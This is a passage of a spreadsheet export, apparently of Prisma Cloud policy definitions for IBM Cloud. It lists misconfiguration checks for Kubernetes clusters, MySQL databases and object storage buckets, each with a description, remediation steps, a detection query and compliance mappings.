          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-kubernetes-cluster' AND json.rule = type equal ignore case openshift and state equal ignore case normal and serviceEndpoints.publicServiceEndpointEnabled is true</t>
        </is>
      </c>
      <c r="AA3332" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3332" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3332" t="inlineStr">
        <is>
          <t>PC-IBM-KBN-983</t>
        </is>
      </c>
      <c r="AD3332" t="b">
        <v>1</v>
      </c>
      <c r="AE3332" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3332" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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2" t="inlineStr">
        <is>
          <t>7bdf5cda-eaf1-455d-97cb-296b501517eb</t>
        </is>
      </c>
      <c r="AI3332" t="inlineStr">
        <is>
          <t>11c7e835-5be1-4baa-90d5-63214e551b3c</t>
        </is>
      </c>
      <c r="AJ3332" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3332" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3333">
      <c r="A3333" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, Telecommunications Security Act - TSA, SOC 2, Telecommunications Security Act - TSA, Microsoft Cloud Security Benchmark v1, CIS v1.1.0 (IBM Cloud) Level 1, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, Secure Controls Framework (SCF) - 2024.2, HIPAA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3333" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3333" s="2" t="inlineStr"/>
      <c r="D3333" t="inlineStr"/>
      <c r="E3333" t="inlineStr"/>
      <c r="F3333" t="inlineStr"/>
      <c r="G3333" t="b">
        <v>1</v>
      </c>
      <c r="H333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3" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3333" t="inlineStr">
        <is>
          <t>ibm-kubernetes</t>
        </is>
      </c>
      <c r="K3333" t="inlineStr">
        <is>
          <t>IBM Cloud Kubernetes secrets data is not encrypted with bring your own key</t>
        </is>
      </c>
      <c r="L3333" t="inlineStr"/>
      <c r="M3333" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3333" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3333" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3333" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3333" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3333" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3333" t="inlineStr"/>
      <c r="T3333" t="b">
        <v>0</v>
      </c>
      <c r="U3333" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3333" t="inlineStr">
        <is>
          <t>ibm-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W3333" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud kubernetes clusters for which secrets data have encryption using key protect disabled. Kubernetes Secret data is encoded in the base64 format and stored as plain text in etcd. Etcd is a key-value store used as a backing store for Kubernetes cluster state and configuration data. Storing Secrets as plain text in etcd is risky, as they can be easily compromised by attackers and used to access systems. It is recommended that secrets data is encrypted for better security.</t>
        </is>
      </c>
      <c r="X3333" t="inlineStr">
        <is>
          <t>1. Log in to your IBM Cloud console.
2. To view the list of services that are available on IBM Cloud, click 'Catalog'.
3. From the 'All Categories' navigation pane, click the 'Security' category.
4. From the list of services, click the Key Protect tile.
5. Select a service plan, and click Create to provision an instance of Key Protect in the
account, region, and resource group where you are logged in.
6. To view a list of your resources, go to 'Menu &gt; Resource List'.
7. From your IBM Cloud resource list, select your provisioned instance of Key Protect.
8. To create a new key, click 'Add +' and select the 'Create a key' window. Specify the
key's name and key type.
9. When you are finished filling out the key's details, click 'Add key' to confirm.
10. From the Clusters console, select the cluster that you want to enable encryption for.
11. From the 'Overview' tab, in the 'Integrations &gt; Key management service' section, click
'Enable'.
12. Select the 'Key management service instance' and 'Root key' that you want to use
for the encryption.
13. Click 'Enable'.
14. Verify that the KMS enablement process is finished. From the 'Summary &gt; Master
status' section, you can check the progress.
15. After the KMS provider is enabled in the cluster, data and new secrets that
are created in the cluster are automatically encrypted by using your root key.</t>
        </is>
      </c>
      <c r="Y3333" t="inlineStr"/>
      <c r="Z3333" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-kubernetes-cluster' AND json.rule = type equal ignore case kubernetes and state equal ignore case "normal" and features.keyProtectEnabled is false</t>
        </is>
      </c>
      <c r="AA3333" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3333" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3333" t="inlineStr">
        <is>
          <t>PC-IBM-KBN-972</t>
        </is>
      </c>
      <c r="AD3333" t="b">
        <v>1</v>
      </c>
      <c r="AE3333" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3333" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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3" t="inlineStr">
        <is>
          <t>14dcf32e-aa8d-45e4-9176-cd79834a6ce6</t>
        </is>
      </c>
      <c r="AI3333" t="inlineStr">
        <is>
          <t>ff2133d7-4bd4-4b97-88d2-368f759165a8</t>
        </is>
      </c>
      <c r="AJ3333" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3333" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3334">
      <c r="A3334" t="inlineStr">
        <is>
          <t>CIS v1.1.0 (IBM Cloud) Level 1, Insurance Regulatory And Development Authority Of India</t>
        </is>
      </c>
      <c r="B3334" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3334" s="2" t="inlineStr"/>
      <c r="D3334" t="inlineStr"/>
      <c r="E3334" t="inlineStr"/>
      <c r="F3334" t="inlineStr"/>
      <c r="G3334" t="b">
        <v>1</v>
      </c>
      <c r="H333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4" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3334" t="inlineStr">
        <is>
          <t>ibm-kubernetes</t>
        </is>
      </c>
      <c r="K3334" t="inlineStr">
        <is>
          <t>IBM Cloud Kubernetes cluster has Image pull secrets disabled</t>
        </is>
      </c>
      <c r="L3334" t="inlineStr"/>
      <c r="M3334" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3334" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3334" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3334" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3334" t="inlineStr">
        <is>
          <t>Security Domain Policies</t>
        </is>
      </c>
      <c r="R3334" t="inlineStr">
        <is>
          <t>Cloud Security Policy</t>
        </is>
      </c>
      <c r="S3334" t="inlineStr"/>
      <c r="T3334" t="b">
        <v>0</v>
      </c>
      <c r="U3334" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3334" t="inlineStr">
        <is>
          <t>ibm-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W3334" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Kubernetes Clusters with Image pull secrets disabled. If Image pull secrets feature Is disabled, it stores registry credentials to connect to container registry. It is recommended to enable image pull secrets feature for proper protection of personal information</t>
        </is>
      </c>
      <c r="X3334" t="inlineStr">
        <is>
          <t>To enable image pull secrets feature on a Kubernetes cluster, refer following URLs:
https://cloud.ibm.com/docs/containers?topic=containers-registry#imagePullSecret_migrate_api_key
https://cloud.ibm.com/docs/containers?topic=containers-registry#update-pull-secret</t>
        </is>
      </c>
      <c r="Y3334" t="inlineStr"/>
      <c r="Z3334" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-kubernetes-cluster' AND json.rule = type equal ignore case kubernetes and state equal ignore case normal and features.pullSecretApplied is false</t>
        </is>
      </c>
      <c r="AA3334" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3334" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3334" t="inlineStr">
        <is>
          <t>PC-IBM-KBN-985</t>
        </is>
      </c>
      <c r="AD3334" t="b">
        <v>1</v>
      </c>
      <c r="AE3334" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3334" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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4" t="inlineStr">
        <is>
          <t>fc225fc5-6752-450e-9679-1f26982aa3df</t>
        </is>
      </c>
      <c r="AI3334" t="inlineStr">
        <is>
          <t>ea779485-7a58-42ec-8201-4d87b4f29f50</t>
        </is>
      </c>
      <c r="AJ3334" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3334" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3335">
      <c r="A3335" t="inlineStr">
        <is>
          <t>HITRUST CSF v.11.2.0, TX-RAMP Level 2, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CIS v1.1.0 (IBM Cloud) Level 1</t>
        </is>
      </c>
      <c r="B3335" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3335" s="2" t="inlineStr"/>
      <c r="D3335" t="inlineStr"/>
      <c r="E3335" t="inlineStr"/>
      <c r="F3335" t="inlineStr"/>
      <c r="G3335" t="b">
        <v>1</v>
      </c>
      <c r="H333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5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3335" t="inlineStr">
        <is>
          <t>ibm-kubernetes</t>
        </is>
      </c>
      <c r="K3335" t="inlineStr">
        <is>
          <t>IBM Cloud Kubernetes clusters are accessible by using public endpoint</t>
        </is>
      </c>
      <c r="L3335" t="inlineStr"/>
      <c r="M3335" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3335" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3335" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3335" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3335" t="inlineStr">
        <is>
          <t>Containers</t>
        </is>
      </c>
      <c r="R3335" t="inlineStr">
        <is>
          <t>7.1.4</t>
        </is>
      </c>
      <c r="S3335" t="inlineStr"/>
      <c r="T3335" t="b">
        <v>0</v>
      </c>
      <c r="U3335" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3335" t="inlineStr">
        <is>
          <t>ibm-kubernetes-cluster</t>
        </is>
      </c>
      <c r="W3335" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud kubernetes clusters which has public service endpoint enabled. If any cluster has public service endpoint enabled, cluster will be accessible on an Internet routable IP address. It is recommended that public service endpoint is disabled and use private service endpoint instead for better security.</t>
        </is>
      </c>
      <c r="X3335" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'Kubernetes' and then 'Clusters'
3. Select the 'Clusters' reported in the alert
4. Under 'Overview' tab and then 'Networking' section, click the 'Disable' radio button for the public service endpoint.
6. In the next screen, click 'Disable' to confirm.
7. In the next screen, click Refresh to initiate an API server refresh.
5. Click on 'Save'</t>
        </is>
      </c>
      <c r="Y3335" t="inlineStr"/>
      <c r="Z3335" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-kubernetes-cluster' AND json.rule = type equal ignore case kubernetes and state equal ignore case "normal" and serviceEndpoints.publicServiceEndpointEnabled is true</t>
        </is>
      </c>
      <c r="AA3335" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3335" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3335" t="inlineStr">
        <is>
          <t>PC-IBM-KBN-971</t>
        </is>
      </c>
      <c r="AD3335" t="b">
        <v>1</v>
      </c>
      <c r="AE3335" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3335" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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5" t="inlineStr">
        <is>
          <t>cb157ea3-4f50-437e-a1ee-ed3bafec9df6</t>
        </is>
      </c>
      <c r="AI3335" t="inlineStr">
        <is>
          <t>48235fcc-bb01-4b3e-aa32-9b95a4016977</t>
        </is>
      </c>
      <c r="AJ3335" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3335" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3336">
      <c r="A3336" t="inlineStr">
        <is>
          <t>Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA</t>
        </is>
      </c>
      <c r="B3336" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3336" s="2" t="inlineStr"/>
      <c r="D3336" t="inlineStr"/>
      <c r="E3336" t="inlineStr"/>
      <c r="F3336" t="inlineStr"/>
      <c r="G3336" t="b">
        <v>1</v>
      </c>
      <c r="H333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6" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3336" t="inlineStr">
        <is>
          <t>ibm-mysql</t>
        </is>
      </c>
      <c r="K3336" t="inlineStr">
        <is>
          <t>IBM Cloud MySQL Database network access is not restricted to a specific IP range</t>
        </is>
      </c>
      <c r="L3336" t="inlineStr"/>
      <c r="M3336" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3336" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3336" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3336" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3336" t="inlineStr">
        <is>
          <t>M2</t>
        </is>
      </c>
      <c r="R3336" t="inlineStr">
        <is>
          <t>2.03</t>
        </is>
      </c>
      <c r="S3336" t="inlineStr"/>
      <c r="T3336" t="b">
        <v>0</v>
      </c>
      <c r="U3336" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3336" t="inlineStr">
        <is>
          <t>ibm-mysql-deployment-info</t>
        </is>
      </c>
      <c r="W3336" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud MySQL Databases with no specified IP range for network access. To restrict access to your databases, you can allowlist specific IP addresses or ranges of IP addresses on your deployment. When no IP addresses are in the allowlist, the allowlist is disabled and the deployment accepts connections from any IP address. It is recommended to create an allowlist, only IP addresses that match the allowlist or are in the range of IP addresses in the allowlist can connect to your deployment</t>
        </is>
      </c>
      <c r="X3336" t="inlineStr">
        <is>
          <t>1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'Resource list', from the list of resources select MySQL database reported in the alert.
3. Refer below URL for setting allowlist IP addresses : https://cloud.ibm.com/docs/cloud-databases?topic=cloud-databases-allowlisting&amp;interface=ui#set-allowlist-ui
4. Please remove IP address starting with '0.0.0.0' if any added already in the allow list and make sure to add IP address other than '0.0.0.0'.</t>
        </is>
      </c>
      <c r="Y3336" t="inlineStr"/>
      <c r="Z3336" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-mysql-deployment-info' AND json.rule = allowedListIPAddresses[*] size equals 0 or allowedListIPAddresses[?any( address equals 0.0.0.0/0 )] exists</t>
        </is>
      </c>
      <c r="AA3336" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3336" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3336" t="inlineStr">
        <is>
          <t>PC-IBM-IMSQ-1000</t>
        </is>
      </c>
      <c r="AD3336" t="b">
        <v>1</v>
      </c>
      <c r="AE3336" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3336" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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6" t="inlineStr">
        <is>
          <t>ecef332a-ae4f-474e-b48c-480ba7b40f91</t>
        </is>
      </c>
      <c r="AI3336" t="inlineStr">
        <is>
          <t>2b91cc3a-f1d6-41fc-b961-6cde9c436934</t>
        </is>
      </c>
      <c r="AJ3336" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3336" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3337">
      <c r="A3337" t="inlineStr">
        <is>
          <t>MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, Telecommunications Security Act - TSA, HITRUST CSF v.11.2.0, TX-RAMP Level 2, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, Telecommunications Security Act - TSA, SOC 2, NYDFS 23 CRR-NY 500.0, CIS v1.1.0 (IBM Cloud) Level 1</t>
        </is>
      </c>
      <c r="B3337" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3337" s="2" t="inlineStr"/>
      <c r="D3337" t="inlineStr"/>
      <c r="E3337" t="inlineStr"/>
      <c r="F3337" t="inlineStr"/>
      <c r="G3337" t="b">
        <v>1</v>
      </c>
      <c r="H333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7" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3337" t="inlineStr">
        <is>
          <t>ibm-mysql</t>
        </is>
      </c>
      <c r="K3337" t="inlineStr">
        <is>
          <t>IBM Cloud Database MySQL is exposed to public</t>
        </is>
      </c>
      <c r="L3337" t="inlineStr"/>
      <c r="M3337" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3337" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3337" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3337" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3337" t="inlineStr">
        <is>
          <t>IBM Cloud Databases Family</t>
        </is>
      </c>
      <c r="R3337" t="inlineStr">
        <is>
          <t>4.3</t>
        </is>
      </c>
      <c r="S3337" t="inlineStr"/>
      <c r="T3337" t="b">
        <v>0</v>
      </c>
      <c r="U3337" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3337" t="inlineStr">
        <is>
          <t>ibm-mysql-deployment-info</t>
        </is>
      </c>
      <c r="W3337" t="inlineStr">
        <is>
          <t>The policy identifies IBM Cloud Database MySQL instances exposed to the public via public endpoints. When provisioning an IBM Cloud database service, it is generally not recommended to use public endpoints because it can pose a security risk. Public endpoints can make your database accessible to anyone with internet access, potentially leaving your data vulnerable to unauthorized access or malicious attacks. Instead, it is recommended to use private endpoints when provisioning a database service in IBM Cloud.</t>
        </is>
      </c>
      <c r="X3337" t="inlineStr">
        <is>
          <t>Refer to the IBM documentation to change the service endpoints from public to private
https://cloud.ibm.com/docs/cloud-databases?topic=cloud-databases-service-endpoints</t>
        </is>
      </c>
      <c r="Y3337" t="inlineStr"/>
      <c r="Z3337" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-mysql-deployment-info' AND json.rule = deployment.enable_public_endpoints is true</t>
        </is>
      </c>
      <c r="AA3337" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3337" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3337" t="inlineStr">
        <is>
          <t>PC-IBM-IMSQ-994</t>
        </is>
      </c>
      <c r="AD3337" t="b">
        <v>1</v>
      </c>
      <c r="AE3337" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3337" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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7" t="inlineStr">
        <is>
          <t>c0ac2cfe-c359-4d21-8d89-282902f1047f</t>
        </is>
      </c>
      <c r="AI3337" t="inlineStr">
        <is>
          <t>a8e23f7f-59d3-4e83-a07d-d3a172083ec6</t>
        </is>
      </c>
      <c r="AJ3337" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3337" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3338">
      <c r="A3338" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, ISO/IEC 27001:2022, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, Microsoft Cloud Security Benchmark v1, DORA, Insurance Regulatory And Development Authority Of India, CIS v1.1.0 (IBM Cloud) Level 1, SOC 2, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B3338" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3338" s="2" t="inlineStr"/>
      <c r="D3338" t="inlineStr"/>
      <c r="E3338" t="inlineStr"/>
      <c r="F3338" t="inlineStr"/>
      <c r="G3338" t="b">
        <v>0</v>
      </c>
      <c r="H333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8" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3338" t="inlineStr">
        <is>
          <t>ibm-mysql</t>
        </is>
      </c>
      <c r="K3338" t="inlineStr">
        <is>
          <t>IBM Cloud MySQL Database disk encryption is not enabled with customer managed keys</t>
        </is>
      </c>
      <c r="L3338" t="inlineStr"/>
      <c r="M3338" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3338" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3338" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3338" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3338" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R3338" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S3338" t="inlineStr"/>
      <c r="T3338" t="b">
        <v>0</v>
      </c>
      <c r="U3338" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3338" t="inlineStr">
        <is>
          <t>ibm-mysql-deployment-info</t>
        </is>
      </c>
      <c r="W3338" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud MySQL Databases with default disk encryption. Using customer managed keys will increase significant control where keys are managed by customers. It is recommended to use customer managed keys for disk encryption which provides customer control over the lifecycle of the keys.</t>
        </is>
      </c>
      <c r="X3338" t="inlineStr">
        <is>
          <t>MySQL database disk encryption can be enabled with Customer managed keys only at the time of
creation.
Please use below link to provide MySQL service to KMS service authorization if not authorized already;
https://cloud.ibm.com/docs/cloud-databases?topic=cloud-databases-key-protect&amp;interface=ui#granting-service-auth
Please use below link to provision a KMS instance with a key to use for encryption if not provisioned:
https://cloud.ibm.com/docs/key-protect?topic=key-protect-getting-started-tutorial#create-keys
Please follow below steps to create a new MySQL deployment from backup of vulnerable MySQL deployment:
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'Resource list', from the list of resources select MySQL database reported in the alert.
3. In the left navigation pane, navigate to 'Backups and restore', under 'Available Backups' section click on 'Create backup' to get latest backup of the database.
4. Under 'Available Backups' tab, click on three dots on the right corner of a row containing latest backup and click on 'Restore backup'.
5. On create a new Database for MySQL from backup page, select all the configuration as per the requirement.
6. Under 'Encryption' section, under 'KMS Instance' please select a KMS instance and a key from the instance to use for encryption.
7. Click on 'Restore backup'.
Please follow below steps to delete the reported database deployment :
1. Log in to the IBM Cloud Console
2. Click on 'Menu Icon' and navigate to 'Resource list'.
3. Select your deployment. Next, by using the stacked three-dot menu icon , choose Delete from the drop list.</t>
        </is>
      </c>
      <c r="Y3338" t="inlineStr"/>
      <c r="Z3338" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-mysql-deployment-info' AND json.rule = deployment.platform_options.disk_encryption_key_crn is empty</t>
        </is>
      </c>
      <c r="AA3338" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3338" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3338" t="inlineStr">
        <is>
          <t>PC-IBM-IMSQ-997</t>
        </is>
      </c>
      <c r="AD3338" t="b">
        <v>1</v>
      </c>
      <c r="AE3338" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3338" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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8" t="inlineStr">
        <is>
          <t>3ab04288-99b7-466a-af1e-0a5efe63123e</t>
        </is>
      </c>
      <c r="AI3338" t="inlineStr">
        <is>
          <t>67f91bb6-da51-4210-adaa-11a8d691b505</t>
        </is>
      </c>
      <c r="AJ3338" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3338" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3339">
      <c r="A3339" t="inlineStr">
        <is>
          <t>CSA CCM v4.0.12, Insurance Regulatory And Development Authority Of India, Microsoft Cloud Security Benchmark v1, HITRUST CSF v.11.2.0</t>
        </is>
      </c>
      <c r="B3339" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3339" s="2" t="inlineStr"/>
      <c r="D3339" t="inlineStr"/>
      <c r="E3339" t="inlineStr"/>
      <c r="F3339" t="inlineStr"/>
      <c r="G3339" t="b">
        <v>1</v>
      </c>
      <c r="H333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39" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="J3339" t="inlineStr">
        <is>
          <t>ibm-object-storage</t>
        </is>
      </c>
      <c r="K3339" t="inlineStr">
        <is>
          <t>IBM Cloud Object Storage bucket is not enabled with IBM Activity Tracker</t>
        </is>
      </c>
      <c r="L3339" t="inlineStr"/>
      <c r="M3339" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3339" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3339" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P3339" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q3339" t="inlineStr">
        <is>
          <t>Control Category: 09.0</t>
        </is>
      </c>
      <c r="R3339" t="inlineStr">
        <is>
          <t>09.aa - Audit Logging</t>
        </is>
      </c>
      <c r="S3339" t="inlineStr"/>
      <c r="T3339" t="b">
        <v>0</v>
      </c>
      <c r="U3339" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3339" t="inlineStr">
        <is>
          <t>ibm-object-storage-bucket</t>
        </is>
      </c>
      <c r="W3339" t="inlineStr">
        <is>
          <t>This policy identifies IBM Cloud Object Storage buckets which have Activity Tracker disabled or not enabled properly. The IBM Cloud Activity Tracker service records user-initiated activities that change the state of a service in IBM Cloud. You can use this service to investigate abnormal activity and critical actions, and to comply with regulatory audit requirements. In addition, you can be alerted about actions as they happen. So, it is recommended to enable Activity tracker to log all read/write data and management events on a bucket.</t>
        </is>
      </c>
      <c r="X3339" t="inlineStr">
        <is>
          <t>To configure Activity Tracker on a Cloud Object Storage bucket, please follow the below URL.
Please make sure to select 'Track data events' checkbox and select 'read &amp; write' option 
from the Activity Tracker dropdown:
https://cloud.ibm.com/docs/cloud-object-storage?topic=cloud-object-storage-at#at-console-enable</t>
        </is>
      </c>
      <c r="Y3339" t="inlineStr"/>
      <c r="Z3339" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'ibm' AND api.name = 'ibm-object-storage-bucket' AND json.rule = activity_tracking does not exist or activity_tracking.write_data_events does not equal ignore case "true" or activity_tracking.read_data_events does not equal ignore case "true"</t>
        </is>
      </c>
      <c r="AA3339" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3339" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3339" t="inlineStr">
        <is>
          <t>PC-IBM-IBJ-1002</t>
        </is>
      </c>
      <c r="AD3339" t="b">
        <v>1</v>
      </c>
      <c r="AE3339" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3339" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG333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39" t="inlineStr">
        <is>
          <t>8c46f144-dac7-4cab-85b0-d2a3d659d366</t>
        </is>
